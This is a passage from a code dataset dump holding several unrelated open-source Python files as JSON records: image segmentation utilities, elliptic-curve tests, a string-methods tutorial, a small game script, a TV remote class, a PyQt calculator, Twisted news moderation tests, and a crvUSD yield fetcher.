np.multiply(img, inv)\n blend = np.add(blend, sem_bdr_rgb)\n else:\n blend = sem_bdr_rgb\n return blend\n\ndef my_argmax(tensor):\n '''\n Fixes the zero channel problem i.e. the class predicted at 0th channel \n wont go to 0 as it does with usual np.argmax\n Parameters\n ----------\n pred_tensor : 3D/4D array of shape [B, H, W, N] or [H, W, N]\n Returns\n -------\n argmaxed output of shape [B, H, W] or [H, W]]\n '''\n pred_tensor = np.copy(tensor)\n j = 0\n for i in range(pred_tensor.shape[-1]):\n j = i+1\n pred_tensor[:,:,:,i] = pred_tensor[:,:,:,i] * j\n \n pred_tensor = np.sum(pred_tensor, axis=-1)\n return pred_tensor \n\ndef plot_confusion_matrix(cm, class_names, normalize = True, show_text = True, from_clf = False, my_cmap = 'Greens'):\n '''\n Parameters\n ----------\n cm : a nxn dim numpy array.\n class_names: a list of class names (str type)\n normalize: whether to normalize the values\n show_text: whether to show value in each block of the matrix, If matrix is large like 10x10 or 20x20 it's better to set it to false\n because it'll be difficult to read values but you can see the network behaviour via color map.\n show_fpfn: whether to show false positives on GT axis and false negatives on Pred axis. FN -> not detected & FP -> wrong detections\n Returns\n -------\n fig: a plot of confusion matrix along with colorbar\n '''\n if from_clf:\n conf_mat = cm\n x_labels = copy.deepcopy(class_names)\n y_labels = copy.deepcopy(class_names)\n else:\n conf_mat = cm[1:, 1:]\n x_labels = class_names\n y_labels = class_names \n \n c_m = conf_mat\n \n if normalize:\n row_sums = c_m.sum(axis=1)\n c_m = c_m / row_sums[:, np.newaxis]\n c_m = np.round(c_m, 3)\n \n fig, ax = plt.subplots(figsize=(len(class_names)+3, len(class_names)+3))\n im = ax.imshow(c_m, cmap = my_cmap) \n \n # We want to show all ticks...\n ax.set_xticks(np.arange(len(y_labels)))\n ax.set_yticks(np.arange(len(x_labels)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(y_labels)\n ax.set_yticklabels(x_labels)\n \n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")#ha=right\n \n if show_text:\n for i in range(len(x_labels)):\n for j in range(len(y_labels)):\n text = ax.text(j, i, c_m[i, j], color=\"k\", ha=\"center\", va=\"center\")#color=clr_select(i, j)\n \n ax.set_title(\"Normalized Confusion Matrix\")\n fig.tight_layout()\n plt.xlabel('Predicted Labels')\n plt.ylabel('True Labels')\n sm = plt.cm.ScalarMappable(cmap=my_cmap, norm=plt.Normalize(vmin=0, vmax=1))\n sm._A = []\n plt.colorbar(sm)\n plt.show() \n return fig \n\ndef water(img, mask):\n '''\n Parameters\n ----------\n img : 3D array, RGB iamge [H W 3]\n mask : 2D array, semantic/binary segmentaion mask [H W]\n\n Returns\n -------\n img : RGB image wiht overlayd boundry instances\n new : instacnes boundaries\n '''\n img = (img).astype(np.uint8)\n mask = (mask).astype(np.uint8)\n original_image = np.copy(img)\n \n # apply threshold to converto sem-mask to binary mask\n ret, thresh = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # so that BG pixel have 0 value and FG will have 255 value\n thresh = 255 - thresh\n \n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n \n # sure background area\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\n \n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n # Normalize the distance image for range = {0.0, 1.0}\n # so we can visualize and threshold it \n dist_transform = cv2.normalize(dist_transform, dist_transform, 0, 1.0, cv2.NORM_MINMAX)\n _, sure_fg = cv2.threshold(dist_transform, 0.4, 1.0, cv2.THRESH_BINARY)\n #ret, sure_fg = cv2.threshold(dist_transform, 0.7*dist_transform.max(), 255, 0)\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg,sure_fg)\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n # Now, mark the region of unknown with zero\n markers[unknown==255] = 0\n \n # remove bg form the image so that water shed will only focus on cells\n img[thresh==0]=1\n \n markers = markers.astype('int32')\n markers = cv2.watershed(img, markers)\n # draw boundaries on real iamge\n original_image[markers == -1] = [255,0,0]\n # draw boundary on empty convas\n new = np.zeros(img.shape)\n new[markers == -1] = [255, 255, 255]\n new = (new).astype(np.uint8)\n new = cv2.cvtColor(new, cv2.COLOR_BGR2GRAY)\n new = (new/255).astype(np.uint8)\n return original_image, new\n\n\ndef sigmoid_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.sigmoid(pred)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds\n\ndef softmax_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.softmax(pred, axis=-1)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds","repo_name":"Mr-TalhaIlyas/TSFD","sub_path":"slide_inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":26272,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"34099645123","text":"import pytest\nfrom keum import FiniteField, PrimeFiniteField\nfrom keum import (\n babyjubjub,\n secp256k1,\n secp256r1,\n pallas,\n vesta,\n tweedledee,\n tweedledum,\n bn254,\n grumpkin,\n)\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n pallas.ProjectiveWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef Ec(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n pallas.ProjectiveWeierstrass,\n ]\n)\ndef ProjectiveEc(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef AffineEc(request):\n return request.param\n\n\ndef test_affine_random_is_on_the_curve(AffineEc):\n a = AffineEc.random()\n assert AffineEc.is_on_curve(a.x, a.y)\n\n\n# def test_affine_encoding_decoding(AffineEc):\n# a = AffineEc.random()\n# assert AffineEc.of_be_bytes_exn(a.to_be_bytes()) == a\n# assert AffineEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_projective_encoding_decoding(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.of_be_bytes_exn(a.to_be_bytes()) == a\n assert ProjectiveEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_affine_generator_is_on_curve(AffineEc):\n g = AffineEc.generator()\n assert AffineEc.is_on_curve(g.x, g.y)\n\n\ndef test_projective_random_is_on_the_curve(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.is_on_curve(x=a.x, y=a.y, z=a.z)\n\n\ndef test_projective_generator_is_on_curve(ProjectiveEc):\n g = ProjectiveEc.generator()\n assert ProjectiveEc.is_on_curve(x=g.x, y=g.y, z=g.z)\n\n\ndef test_zero_is_identity_for_addition(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a + zero == a\n assert zero + a == a\n\n\ndef test_equality_handles_zero(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a != zero\n assert Ec.zero() == Ec.zero()\n\n\ndef test_negate_identity(Ec):\n assert Ec.zero().negate() == Ec.zero()\n\n\ndef test_negate(Ec):\n a = Ec.random()\n assert a == a.negate().negate()\n\n\ndef test_addition_support_same_points(Ec):\n p = Ec.random()\n assert p + p == p.double()\n\n\ndef test_affine_addition_of_two_points_is_on_the_curve(AffineEc):\n p1 = AffineEc.random()\n p2 = AffineEc.random()\n p = p1 + p2\n assert AffineEc.is_on_curve(x=p.x, y=p.y)\n\n\ndef test_projective_addition_of_two_points_is_on_the_curve(ProjectiveEc):\n p1 = ProjectiveEc.random()\n p2 = ProjectiveEc.random()\n p = p1 + p2\n assert ProjectiveEc.is_on_curve(x=p.x, y=p.y, z=p.z)\n\n\ndef test_mul_zero_gives_identity(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(0)) == Ec.zero()\n\n\ndef test_mul_one_gives_same_point(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(1)) == p\n\n\ndef test_mul_by_two_gives_double(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(2)) == p.double()\n\n\ndef test_add_is_commutative(Ec):\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = p1 + p2\n rhs = p2 + p1\n assert lhs == rhs\n\n\ndef test_distributivity_scalar_multiplication(Ec):\n a = Ec.Fr.random()\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = (p1 + p2).mul(a)\n rhs = p1.mul(a) + p2.mul(a)\n assert lhs == rhs\n","repo_name":"dannywillems/py-keum","sub_path":"tests/test_ec.py","file_name":"test_ec.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74874877767","text":"'92'.zfill(5)\n# '00092'\n\n'9123'.zfill(5)\n# '09123'\n\nmsg = 'Hello world!'\nmsg.count('l')\n# 3\n\nmsg.endswith('!')\n# True\n\nmsg.startswith('L')\n# False\n\nmsg.find('w')\n# 7\n\n'hello4'.isdigit()\n# False\n\n'4'.isdigit()\n# True\n\nmsgList = ['hello','world','test']\n\"-\".join(msgList)\n# 'hello-world-test'\n\n\"LOL\".lower()\n# 'lol'\n\n\"lololol\".upper()\n# 'LOLOLOL\n\n'mr Potato'.capitalize()\n# 'Mr Potato'\n\n\"LOL\".isupper()\n# True\n\n'lol'.isupper()\n# False\n\nvegs = 'tomato-potato-carrot'\nvegs.replace('-','=')\n# tomato=potato=carrot\n\nvegs.replace('-','=',1)\n# tomato=potato-carrot\n\ntext = \"I admire you so much\"\ntext.replace(' ','...')\n# 'I...admire...you...so...much'\n\nanimals = \"goats,chickens,ducks,pigs,alpacas\"\nanimals.split(',')\n# ['goats','chickens','ducks','pigs','alpacas']\n\n\"\"\"\nHello\nI\nSee\nYou\"\"\".splitlines()\n# ['','Hello','I','See','You']\n\nuser_input = ' catlady '\nuser_input.strip()\n# 'catlady'\n\nuser_input2 = ' ca t l a dy '\nuser_input2.strip()\n# 'ca t l a dy'\n# doesn't remove the spaces in between the chars","repo_name":"khelyorbek/Learning","sub_path":"18_Python/18_2_Python Data Structures/7_string_methods.py","file_name":"7_string_methods.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41880483578","text":"\"\"\"Defending the earth mother.\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport grimoire\nfrom utils import inventories\n\nP = np.exp(-np.log(2.0)/52.0)\n\"\"\"Cone survival probability per week\"\"\"\n\ndef drop(trans):\n \"\"\"Drops magic cones, maybe.\"\"\"\n spells = list(grimoire.SPELLBOOK.keys())\n nspells = len(spells)\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n if (cones <= 512 and p <= cones / 1024.0) or \\\n (cones > 512 and p <= cones / 2.0**(int(np.log2(cones)) + 2)):\n hist.append({'player': player, 'kind': 'drop', \n 'magic': {spells[np.random.randint(0, nspells)]: 1}})\n\ndef decay(trans):\n \"\"\"Decays cones weekly - you must stay active!\"\"\"\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n # trick to obtain average decay behaviour, even in small samples, \n # without having to roll for each cone individually.\n q, r = divmod(cones*P, 1)\n n = int(q) + int(p <= r)\n if n != cones:\n hist.append({'player': player, 'kind': 'decay', 'cones': n - cones})\n \n \n ","repo_name":"pyne/magic-cones","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43931810327","text":"import time\nimport random\nimport msvcrt\n\nclass Kumanda():\n def __init__(self,televizyon_durumu = \"Kapalı\",ses_düzeyi = 0,kanal_listesi = [\"TRT\"],açık_kanal = \"TRT\"):\n print(\"Televizyon oluşturuluyor...\")\n self.televizyon_durumu = televizyon_durumu\n self.ses_düzeyi = ses_düzeyi\n self.kanal_listesi = kanal_listesi\n self.açık_kanal = açık_kanal\n def sesi_düzenle(self):\n while True:\n karakter = input(\"Sesi artırmak için'Arttır'\\nSesi azaltmak için'Azalt'\\nÇıkmak için 'çıkış' yazınız.\\nSeçim:\")\n if (karakter == \"Arttır\"):\n while True:\n x = int(input(\"Arttırmak istediğiniz miktarı giriniz:\\n\"))\n if (x < 0):\n print(\"Böyle bir sayı arttıramazsınız...\")\n elif(x > 0):\n self.ses_düzeyi += x\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"Azalt\"):\n while True:\n y = int(input(\"Azaltmak istediğiniz miktarı giriniz:\\n\"))\n if (y < 0):\n print(\"Böyle bir sayı kadar azaltamazsınız...\")\n elif (y > 0):\n self.ses_düzeyi -= y\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"çıkış\"):\n print(\"Komut alındı\")\n time.sleep(0.5)\n print(\"Çıkış yapılıyor\")\n break\n else:\n print(\"Geçersiz işlem\")\n def tv_kapat(self):\n if (self.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon zaten kapalı....\")\n else:\n print(\"Tv Kapatılıyor...\")\n time.sleep(0.5)\n print(\"Tv kapatıldı...\")\n self.televizyon_durumu = \"Kapalı\"\n def tv_aç(self):\n if (self.televizyon_durumu == \"Açık\"):\n print(\"Televizyon zaten açık...\")\n else:\n print(\"Televizyon açılıyor...\")\n time.sleep(0.5)\n print(\"Televizyon açıldı....\")\n self.televizyon_durumu = \"Açık\"\n def __str__(self):\n return \"TV durumu:{}\\nSes düzeyi:{}\\nKanal Listesi:{}\\nAçık kanal:{}\".format(self.televizyon_durumu,self.ses_düzeyi,self.kanal_listesi,self.açık_kanal)\n def __len__(self):\n return len(self.kanal_listesi)\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi) - 1)\n self.açık_kanal = self.kanal_listesi[rastgele]\n print(\"Şuan açık kanal:\",self.açık_kanal)\n def kanal_ekle(self,kanal):\n print(\"Kanal eklendi:\",kanal)\n self.kanal_listesi.append(kanal)\nkumanda = Kumanda()\nprint(\"\"\"*******************\n\nTelevizyon Uygulaması\n\nİşlemler ;\n\n1. Televizyonu Aç\n\n2. Televizyonu Kapat\n\n3. Televizyon Bilgileri\n\n4. Kanal Sayısını Öğrenme\n\n5. Kanal Ekle\n\n6. Rastgele Kanal'a Geç\n\n7. Sesi Düzenle\n\nÇıkmak için 'Çıkış' yazın.\n*******************\"\"\")\nwhile True:\n işlem = input(\"Lütfen gireceğiniz işlemi seçiniz:\")\n if (işlem == \"1\"):\n kumanda.tv_aç()\n elif(işlem == \"2\"):\n kumanda.tv_kapat()\n elif(işlem == \"3\"):\n print(kumanda)\n elif(işlem == \"4\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n print(\"Kanal sayısı :\", len(kumanda))\n elif(işlem == \"5\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kanallar = input(\"Eklemek İstediğiniz Kanalları ',' ile ayırarak girin:\")\n eklenecekler = kanallar.split(\",\")\n for i in eklenecekler:\n kumanda.kanal_ekle(i)\n print(\"Kanal Listesi başarıyla güncellendi...\")\n elif (işlem == \"6\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.rastgele_kanal()\n elif(işlem == \"7\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.sesi_düzenle()\n elif(işlem == \"Çıkış\"):\n print(\"Çıkış yapılıyor...%\",random.randint(0,50))\n time.sleep(1)\n print(\"Çıkış yapılıyor...%\", random.randint(50,99))\n time.sleep(1)\n print(\"Çıkış yapılıyor...½100\")\n time.sleep(1)\n print(\"Çıkış yapıldı...\")\n break\n else:\n print(\"Böyle bir işlem yapamazsınız!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oayk23/python_repository","sub_path":"kumanda.py","file_name":"kumanda.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5102580490","text":"import os\r\nimport sys\r\nimport math\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\nfrom functools import partial\r\n\r\nqtCreatorFile = \"AppGui.ui\"\r\nif os.path.isfile ( qtCreatorFile ):\r\n\t# Use AppGui.ui file for debug\r\n\tUi_MainWindow, QtBaseClass = uic.loadUiType ( qtCreatorFile )\r\nelse:\r\n\t# Use converted AppGui.py file for release\r\n\tfrom AppGui import Ui_MainWindow\r\n\r\n\r\nclass Calculator ( QtWidgets.QMainWindow, Ui_MainWindow ):\r\n\t'''\r\n\tCalculator application.\r\n\t'''\r\n\tdef __init__ ( self ):\r\n\t\tQtWidgets.QMainWindow.__init__ ( self )\r\n\t\tUi_MainWindow.__init__ ( self )\r\n\t\tself.setupUi ( self )\r\n\t\tself.setWindowFlags ( QtCore.Qt.Window | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint |\r\n\t\t QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowStaysOnTopHint |\r\n\t\t QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint )\r\n\r\n\t\tself.listButtons = [ self.btn0, self.btn1, self.btn2, self.btn3,\r\n\t\t\t\t\t\t\t self.btn4, self.btn5, self.btn6, self.btn7,\r\n\t\t\t\t\t\t\t self.btn8, self.btn9, self.btnDot,\r\n\t\t\t\t\t\t\t self.btnPlus, self.btnMinus, self.btnMultiply, self.btnDivide,\r\n\t\t\t\t\t\t\t self.btnDel, self.btnAc, self.btnEqual, self.btnSquareRoot ]\r\n\r\n\t\tfor index in range ( 15 ):\r\n\t\t\t# for some reason, lamda doesn't work here but partial works\r\n\t\t\t#self.listButtons [ index ].clicked.connect ( lambda: self.cbBtnNumberClicked ( self.listButtons [ index ].text () ) )\r\n\t\t\tself.listButtons [ index ].clicked.connect ( partial ( self.cbBtnNumberClicked, self.listButtons [ index ].text () ) )\r\n\r\n\t\tself.btnDel.clicked.connect ( self.cbBtnDelClicked )\r\n\t\tself.btnAc.clicked.connect ( self.cbBtnAcClicked )\r\n\t\tself.btnEqual.clicked.connect ( self.cbBtnEqualClicked )\r\n\t\tself.btnSquareRoot.clicked.connect ( self.cbBtnSquareRootClicked )\r\n\r\n\tdef cbBtnNumberClicked ( self, text ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tnew_value = current_value + str ( text )\r\n\t\tself.txtResult.setText ( new_value )\r\n\r\n\tdef cbBtnEqualClicked ( self ):\r\n\t\tresult = eval ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( result ) )\r\n\r\n\tdef cbBtnAcClicked ( self ):\r\n\t\tself.txtResult.setText ( \"\" )\r\n\r\n\tdef cbBtnDelClicked ( self ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tself.txtResult.setText ( current_value[:-1] )\r\n\r\n\tdef cbBtnSquareRootClicked ( self ):\r\n\t\tvalue = float ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( math.sqrt ( value ) ) )\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\twindow = Calculator()\r\n\twindow.show()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"ylyang-dev/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71710699848","text":"__metaclass__ = type\n\nfrom email.Parser import Parser\nfrom socket import gethostname\n\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import succeed\nfrom twisted.mail.smtp import messageid\nfrom twisted.news.database import Article, PickleStorage, NewsShelf\n\n\n\nclass ModerationTestsMixin:\n \"\"\"\n Tests for the moderation features of L{INewsStorage} implementations.\n \"\"\"\n def setUp(self):\n self._email = []\n\n\n def sendmail(self, smtphost, from_addr, to_addrs, msg,\n senderDomainName=None, port=25):\n \"\"\"\n Fake of L{twisted.mail.smtp.sendmail} which records attempts to send\n email and immediately pretends success.\n\n Subclasses should arrange for their storage implementation to call this\n instead of the real C{sendmail} function.\n \"\"\"\n self._email.append((\n smtphost, from_addr, to_addrs, msg, senderDomainName, port))\n return succeed(None)\n\n\n _messageTemplate = \"\"\"\\\nFrom: some dude\nTo: another person\nSubject: activities etc\nMessage-ID: %(articleID)s\nNewsgroups: %(newsgroup)s\n%(approved)s\nBody of the message is such.\n\"\"\".replace('\\n', '\\r\\n')\n\n\n def getApprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message including an\n I{Approved} header indicating it has passed through moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': 'Approved: yup\\r\\n'}\n\n\n def getUnapprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message with no\n I{Approved} header indicating it may require moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': '\\r\\n'}\n\n\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Override in a subclass to return a L{INewsStorage} provider to test for\n correct moderation behavior.\n\n @param groups: A C{list} of C{str} naming the groups which should exist\n in the resulting storage object.\n\n @param moderators: A C{dict} mapping C{str} each group name to a C{list}\n of C{str} giving moderator email (RFC 2821) addresses.\n \"\"\"\n raise NotImplementedError()\n\n\n def test_postApproved(self):\n \"\"\"\n L{INewsStorage.postRequest} posts the message if it includes an\n I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getApprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbPosted(ignored):\n self.assertEqual(self._email, [])\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertTrue)\n return exists\n result.addCallback(cbPosted)\n return result\n\n\n def test_postModerated(self):\n \"\"\"\n L{INewsStorage.postRequest} forwards a message to the moderator if it\n does not include an I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getUnapprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbModerated(ignored):\n self.assertEqual(len(self._email), 1)\n self.assertEqual(self._email[0][0], mailhost)\n self.assertEqual(self._email[0][1], sender)\n self.assertEqual(self._email[0][2], [moderator])\n self._checkModeratorMessage(\n self._email[0][3], sender, moderator, group, message)\n self.assertEqual(self._email[0][4], None)\n self.assertEqual(self._email[0][5], 25)\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertFalse)\n return exists\n result.addCallback(cbModerated)\n return result\n\n\n def _checkModeratorMessage(self, messageText, sender, moderator, group, postingText):\n p = Parser()\n msg = p.parsestr(messageText)\n headers = dict(msg.items())\n del headers['Message-ID']\n self.assertEqual(\n headers,\n {'From': sender,\n 'To': moderator,\n 'Subject': 'Moderate new %s message: activities etc' % (group,),\n 'Content-Type': 'message/rfc822'})\n\n posting = p.parsestr(postingText)\n attachment = msg.get_payload()[0]\n\n for header in ['from', 'to', 'subject', 'message-id', 'newsgroups']:\n self.assertEqual(posting[header], attachment[header])\n\n self.assertEqual(posting.get_payload(), attachment.get_payload())\n\n\n\nclass PickleStorageTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{PickleStorage}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{PickleStorage} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n storage = PickleStorage(\n storageFilename, groups, moderators, mailhost, sender)\n storage.sendmail = self.sendmail\n self.addCleanup(PickleStorage.sharedDBs.pop, storageFilename)\n return storage\n\n\n\nclass NewsShelfTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{NewsShelf}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{NewsShelf} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n shelf = NewsShelf(mailhost, storageFilename, sender)\n for name in groups:\n shelf.addGroup(name, 'm') # Dial 'm' for moderator\n for address in moderators.get(name, []):\n shelf.addModerator(name, address)\n shelf.sendmail = self.sendmail\n return shelf\n\n\n def test_notifyModerator(self):\n \"\"\"\n L{NewsShelf.notifyModerator} sends a moderation email to a single\n moderator.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp(), 'alice@example.com')\n shelf.sendmail = self.sendmail\n shelf.notifyModerator('bob@example.org', Article('Foo: bar', 'Some text'))\n self.assertEqual(len(self._email), 1)\n\n\n def test_defaultSender(self):\n \"\"\"\n If no sender is specified to L{NewsShelf.notifyModerators}, a default\n address based on the system hostname is used for both the envelope and\n RFC 2822 sender addresses.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp())\n shelf.sendmail = self.sendmail\n shelf.notifyModerators(['bob@example.org'], Article('Foo: bar', 'Some text'))\n self.assertEqual(self._email[0][1], 'twisted-news@' + gethostname())\n self.assertIn('From: twisted-news@' + gethostname(), self._email[0][3])\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/twisted/news/test/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"} +{"seq_id":"37659028913","text":"from operator import and_\nfrom typing import List\nimport requests\nfrom sqlalchemy import func\nimport logging\nfrom main import db\nfrom models.convex.snapshot import ConvexPoolSnapshot\nfrom models.curve.crvusd import CrvUsdYield\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_latest_convex_pool_apr() -> List:\n subquery = (\n db.session.query(\n ConvexPoolSnapshot.poolName,\n func.max(ConvexPoolSnapshot.timestamp).label(\"max_timestamp\"),\n )\n .filter(\n ConvexPoolSnapshot.poolName.ilike(\n \"%Curve.fi Factory Plain Pool: crvUSD%\"\n )\n )\n .group_by(ConvexPoolSnapshot.poolName)\n .subquery()\n )\n\n result = (\n db.session.query(\n ConvexPoolSnapshot.baseApr,\n ConvexPoolSnapshot.crvApr,\n ConvexPoolSnapshot.cvxApr,\n ConvexPoolSnapshot.extraRewardsApr,\n ConvexPoolSnapshot.timestamp,\n ConvexPoolSnapshot.poolName,\n )\n .join(\n subquery,\n and_(\n ConvexPoolSnapshot.poolName == subquery.c.poolName,\n ConvexPoolSnapshot.timestamp == subquery.c.max_timestamp,\n ),\n )\n .all()\n )\n\n return [\n CrvUsdYield(\n platform=\"Convex\", pool=r[5], apy=(r[0] + r[1] + r[2] + r[3]) * 100\n )\n for r in result\n ]\n\n\ndef get_max_boost_curve_yield() -> List[CrvUsdYield]:\n CURVE_APR = \"https://www.convexfinance.com/api/curve-apys\"\n r = requests.get(CURVE_APR)\n return [\n CrvUsdYield(\n platform=\"Curve (max boost)\",\n pool=k,\n apy=v[\"crvApy\"] + v[\"baseApy\"],\n )\n for k, v in r.json()[\"apys\"].items()\n if \"factory-crvusd\" in k\n ]\n\n\ndef get_std_yields() -> List[CrvUsdYield]:\n STD_YIELD = \"https://lockers.stakedao.org/api/strategies/cache/curve\"\n r = requests.get(STD_YIELD)\n yields = {\n a[\"name\"]: sum([b[\"apr\"] for b in a[\"aprBreakdown\"]]) * 100\n for a in r.json()\n if \"crvusd\" in a[\"key\"]\n }\n return [\n CrvUsdYield(platform=\"StakeDAO\", pool=k, apy=v)\n for k, v in yields.items()\n ]\n\n\ndef get_crv_usd_yields() -> List[CrvUsdYield]:\n try:\n convex_yields = get_latest_convex_pool_apr()\n except Exception as e:\n logger.error(f\"Error fetching Convex yields : {e}\")\n convex_yields = []\n try:\n curve_yields = get_max_boost_curve_yield()\n except Exception as e:\n logger.error(f\"Error fetching Curve yields : {e}\")\n curve_yields = []\n try:\n std_yields = get_std_yields()\n except Exception as e:\n logger.error(f\"Error fetching StakeDAO yields : {e}\")\n std_yields = []\n\n return convex_yields + curve_yields + 